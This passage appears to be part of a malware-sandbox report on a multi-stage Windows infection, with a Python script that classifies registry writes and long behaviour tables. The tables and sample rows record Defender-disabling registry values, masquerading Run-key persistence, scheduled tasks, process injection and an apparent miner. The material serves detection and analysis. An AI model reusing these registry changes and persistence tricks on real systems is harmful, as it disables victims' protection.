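    name = key.rsplit("\\", 1)[1]
    if DEFENDER_RTP in key and name.startswith("Disable") and val == "1":
        return "defender_rtp_disabled"
    if key.endswith(TAMPER_KEY) and val == "0":
        return "defender_tamper_protection_off"
    if any(r in key for r in RUN_KEYS):
        image = image_of(val)
        if image.lower() == "rundll32.exe" and "advpack.dll,DelNodeRunDLL32" in val:
            # wextract registers this itself to delete its IXPnnn.TMP directory at
            # next logon; it marks SFX packaging, not attacker persistence.
            return "wextract_cleanup"
        if any(p in image.lower() for p in USER_WRITABLE):
            if name.lower() in WINDOWS_COMPONENT_NAMES:
                return "run_masquerade_user_writable"
            return "run_user_writable"
        return "run_other"
    return None


def analyze(lines):
    """One finding per recognised event: kind, value name, launched image, writing process."""
    findings = []
    for line in lines:
        ev = parse_set(line)
        kind = classify(ev) if ev else None
        if kind is None:
            continue
        findings.append({
            "kind": kind,
            "name": ev["key"].rsplit("\\", 1)[1],
            "image": image_of(ev["value"]) if kind.startswith(("run", "wextract")) else None,
            "process": ev["process"],
        })
    return findings


def defender_disabled_settings(findings):
    """Sorted names of the Real-Time Protection policies switched off."""
    return sorted(f["name"] for f in findings if f["kind"] == "defender_rtp_disabled")


SAMPLE_ROWS = [
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\1012578001\b3da59fcc7.exe N/A',
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\1012578001\b3da59fcc7.exe N/A',
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\1012578001\b3da59fcc7.exe N/A',
    r'Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\b3da59fcc7.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012578001\\b3da59fcc7.exe" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A',
    r'Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SmartScreen = "C:\\Users\\Admin\\AppData\\Local\\Temp\\smartscreen.exe" C:\Users\Admin\AppData\Local\Temp\smartscreen.exe N/A',
    r'Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\COM Surrogate = "C:\\Users\\Admin\\AppData\\Local\\asm\\COMSurrogate.exe" C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe N/A',
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\1e4062e1c5d86c1bc855d10e16bf457c5fb5bddcb1ddc9093c0e0d8bc569b35e.exe N/A',
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_ROWS):
        print(f["kind"], "|", f["name"], "|", f["image"], "| written by", f["process"])
```

The writer column matters as much as the key: every Run value is written by skotes.exe rather than by the payload it registers, so the loader is the process to contain, and the Defender policy writes all come from one payload, b3da59fcc7.exe, which is the one worth pulling first for static analysis.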

Checks installed software on the system

discovery

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\PackageExpression C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe N/A
File created C:\Windows\Tasks\skotes.job C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1G18s2.exe N/A
File opened for modification C:\Windows\MovieArchives C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012577001\69efc78da7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012579001\4fe69191d8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1G18s2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\tasklist.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012576001\1dd8bdd825.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-OIS64.tmp\i1A5m12.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1e4062e1c5d86c1bc855d10e16bf457c5fb5bddcb1ddc9093c0e0d8bc569b35e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\curl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language C:\Users\Admin\AppData\Local\Temp\1012577001\69efc78da7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\curl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\xcopy.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\T5v89.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012575001\f56e441c8f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage C:\Users\Admin\AppData\Local\Temp\1012577001\69efc78da7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012578001\b3da59fcc7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2M4078.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\tasklist.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\choice.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3Z39A.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A

Runs net.exe

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1G18s2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1G18s2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2M4078.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2M4078.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-OIS64.tmp\i1A5m12.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-OIS64.tmp\i1A5m12.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3Z39A.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3Z39A.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012575001\f56e441c8f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012575001\f56e441c8f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012576001\1dd8bdd825.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012576001\1dd8bdd825.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012577001\69efc78da7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012577001\69efc78da7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012578001\b3da59fcc7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012578001\b3da59fcc7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012577001\69efc78da7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012577001\69efc78da7.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1012578001\b3da59fcc7.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\asm\mi.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\asm\mi.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1G18s2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-OIS64.tmp\i1A5m12.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012577001\69efc78da7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012577001\69efc78da7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012577001\69efc78da7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012577001\69efc78da7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012577001\69efc78da7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012577001\69efc78da7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012577001\69efc78da7.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012577001\69efc78da7.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012577001\69efc78da7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012577001\69efc78da7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012577001\69efc78da7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\asm\mi.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012577001\69efc78da7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012577001\69efc78da7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012577001\69efc78da7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012577001\69efc78da7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012577001\69efc78da7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012577001\69efc78da7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012577001\69efc78da7.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012577001\69efc78da7.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012577001\69efc78da7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012577001\69efc78da7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012577001\69efc78da7.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3448 wrote to memory of 4048 N/A C:\Users\Admin\AppData\Local\Temp\1e4062e1c5d86c1bc855d10e16bf457c5fb5bddcb1ddc9093c0e0d8bc569b35e.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\T5v89.exe
PID 3448 wrote to memory of 4048 N/A C:\Users\Admin\AppData\Local\Temp\1e4062e1c5d86c1bc855d10e16bf457c5fb5bddcb1ddc9093c0e0d8bc569b35e.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\T5v89.exe
PID 3448 wrote to memory of 4048 N/A C:\Users\Admin\AppData\Local\Temp\1e4062e1c5d86c1bc855d10e16bf457c5fb5bddcb1ddc9093c0e0d8bc569b35e.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\T5v89.exe
PID 4048 wrote to memory of 1848 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\T5v89.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1G18s2.exe
